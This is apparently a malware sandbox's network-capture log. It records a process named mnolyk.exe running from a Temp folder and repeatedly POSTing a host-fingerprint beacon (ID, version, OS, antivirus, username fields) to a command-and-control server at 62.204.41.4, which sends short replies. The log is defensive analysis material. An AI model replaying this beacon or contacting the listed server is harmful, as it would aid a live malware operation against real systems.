Feb 7, 2023 19:58:53.814133883 CET	613	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
388	192.168.2.5	50099	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:53.985605955 CET	614	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:54.051942110 CET	614	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
389	192.168.2.5	50100	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:54.228468895 CET	615	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:54.292793989 CET	615	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.2.5	49739	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:15.413161039 CET	167	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:15.476524115 CET	167	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
390	192.168.2.5	50101	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:54.467417955 CET	616	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:54.532475948 CET	616	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
391	192.168.2.5	50102	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:54.714298964 CET	617	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:54.779995918 CET	617	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
392	192.168.2.5	50103	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:54.948415995 CET	618	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:55.013876915 CET	618	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
393	192.168.2.5	50104	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:55.183792114 CET	619	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:55.254606962 CET	619	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
394	192.168.2.5	50105	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:55.457748890 CET	620	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:55.523557901 CET	620	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
395	192.168.2.5	50106	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:55.697715044 CET	621	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:55.760951042 CET	621	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
396	192.168.2.5	50107	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:55.941894054 CET	622	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:56.004034996 CET	622	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
397	192.168.2.5	50108	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:56.182131052 CET	623	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:56.248547077 CET	623	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
398	192.168.2.5	50109	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:56.416169882 CET	624	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:56.477792025 CET	624	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
399	192.168.2.5	50110	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:56.657476902 CET	625	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:56.720432997 CET	625	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49701	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:04.541289091 CET	100	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:04.605540991 CET	100	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	192.168.2.5	49740	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:15.662782907 CET	168	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:15.726018906 CET	168	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
400	192.168.2.5	50111	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:56.896574020 CET	626	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:56.959562063 CET	626	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
401	192.168.2.5	50112	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:57.136239052 CET	627	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:57.203440905 CET	627	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
402	192.168.2.5	50113	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:57.370708942 CET	628	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:57.436136007 CET	628	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
403	192.168.2.5	50114	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:57.604604959 CET	629	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:57.668451071 CET	629	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
404	192.168.2.5	50115	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:57.838937044 CET	630	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:57.902601004 CET	630	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
405	192.168.2.5	50116	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:58:58.086949110 CET	631	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:58:58.152918100 CET	631	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:58:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
406	192.168.2.5	50117	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
